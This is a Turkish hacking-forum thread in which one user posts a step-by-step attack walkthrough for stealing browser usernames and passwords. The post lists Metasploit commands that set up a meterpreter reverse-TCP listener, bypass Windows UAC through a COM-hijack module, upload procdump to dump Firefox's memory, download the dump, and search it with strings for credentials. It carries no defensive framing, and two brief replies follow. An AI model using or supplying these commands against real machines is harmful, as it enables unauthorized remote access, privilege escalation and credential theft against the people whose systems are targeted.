THT DUYURU

Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

Seçenekler

Tarayıcıdan String Değeri ile Kullanıcı Adı Şifre Öğrenmek // Qwx

Qwx
Qwx - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
04/2012
Mesajlar:
2.734
Konular:
116
Teşekkür (Etti):
96
Teşekkür (Aldı):
613
Ticaret:
(0) %
20-10-2019 19:17
#1
Tarayıcıdan String Değeri ile Kullanıcı Adı Şifre Öğrenmek // Qwx
Tarayıcıdan String Değerlerini Alma

Bu konumuzda hedef makinenin tarayıcısından string değerleri alıp ilgili string değerlerini inceleyip bilgi edinme işlemini gerçekleştireceğiz. Şifrelerin ve kullanıcı adların olduğu yerleri bulmak adına detaylı bir arama gerçekleştirilmesi gerekmektedir. İlgili dosyanın büyüklüğü ve işlemci hızınıza göre dosyaların açılma hızı cihazlarınızda farklılıklar göstermektedir. CTRL + F kısayolu ile de istediğiniz bilgilere kısa bir şekilde ulaşabilirsiniz.



Öncelikle Métasploit aracımızı çalıştırıyoruz. Bunun için terminal ekranımıza msfconsole komutunu yazıyoruz.



Ardından Payload'ımızı seçmek için ilgili kodları giriyoruz. use exploit/multi/handler ardından set PAYLOAD windows/meterpreter/reverse_tcp komutunu girerek payloadımızın seçiminizi tamamlıyoruz. İlgili payloadımızın bizlerden neler istediğine bakmak için options komutunu kullanıyoruz.



Bizden istediği yerleri doldurmak için IP adresimizi öğrenmemiz gerekmektedir. Bunun için ise yine terminal ekranımıza ifconfig komutunu girerek IP adresimizi öğreniyoruz.



IP Adresimizi de öğrendikten sonra sırada bizden istediği bilgileri doldurmaktadır. set LHOST <ipadresiniz> ardından set LPORT <port> ile bağlantı sağlanacak port numarasını girdikten sonra exploit komutu ile başlatıyoruz.



Dinleme işlemine almış bulunmaktayız. Şimdi sıra hedef makineden internete bağlanma işlemi olacaktır ve bizler de de hedef makine görünecektir.



Evet, bağlantımız başarılı bir şekilde gelmiş bulunmaktadır. sessions komutu ile de bağlantımızı görebilmekteyiz. Ardından Kullanıcı Hesap Denetimini (UAC) bypass işlemini gerçekleştireceğiz.



UAC bypass işlemi için ise use exploit/windows/local/bypassuac_comhijack komutunu giriyoruz. Ardından tekrardan options komutu ile bizlerden neler istediğine bakıyoruz.



İstekleri sadece bir SESSION olmaktadır. sessions komutu ile tekrardan görüntüleyip ilgili hedefi seçebiliriz. Seçim işlemini gerçekleştirmek için ise set SESSION 1 komutunu yazıp ENTER'a basıyoruz.




Sisteme giriş işlemimiz tamamlandıktan sonra procdump.exe dosyamızı hedef makineye upload işlemini gerçekleştriyoruz.



İlk olarak tasklist komutu ile çalışan işlemlerin listesini görüntülüyoruz. Ardından inceleme yapmak adına bir seçimde bulunuyoruz ve procdump -ma 1408 komutu ile değerleri almış oluyoruz.



Şimdi almış olduğumuz bu dosyayı kendi sistemimize indireceğiz. İndirme işlemini başlatmak için ise download <firefox.exe_dosya_adi_.dmp /root/ komutu ile de indirme işlemini tamamlamış olacaksınız.



İndirme işlemimiz de tamamlandıktan sonra şimdi bu dosyayı inceleme işlemine geçiyoruz. Bunun için ise terminal ekranımıza strings -td <firefox.exe_dosya_adi.dmp> komutunu yazdığınız zaman inceleme işlemine başlayabilirsiniz.



---------------------
A hacker does for love what others would not do for money.
Konu Qwx tarafından (20-10-2019 19:29 Saat 19:29 ) değiştirilmiştir.
Xowly, coldplus, InSpy, AhmetKaan46, The CrueL Teşekkür etti.
Qwx
Qwx - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
04/2012
Mesajlar:
2.734
Konular:
116
Teşekkür (Etti):
96
Teşekkür (Aldı):
613
Ticaret:
(0) %
20-10-2019 23:01
#2
Cevap: Tarayıcıdan String Değeri ile Kullanıcı Adı Şifre Öğrenmek // Qwx
+++++
---------------------
A hacker does for love what others would not do for money.
coldplus - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2017
Mesajlar:
362
Konular:
49
Teşekkür (Etti):
176
Teşekkür (Aldı):
50
Ticaret:
(0) %
20-10-2019 23:27
#3
Cevap: Tarayıcıdan String Değeri ile Kullanıcı Adı Şifre Öğrenmek // Qwx
Ah eski günler ahh. Nerde o eski günler... Şimdiye buralar yorum ile like taşmıştı.. Şimdiye bak birde..1 like 0 yorum..
---------------------
Ben Kimsenin Canını Yakmadım,
Onlar Benim Ateş Olduğumu Bile Bile Üzerime Geldiler..!


ASALETİN ADI>> YILMAZ GÜNEY

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler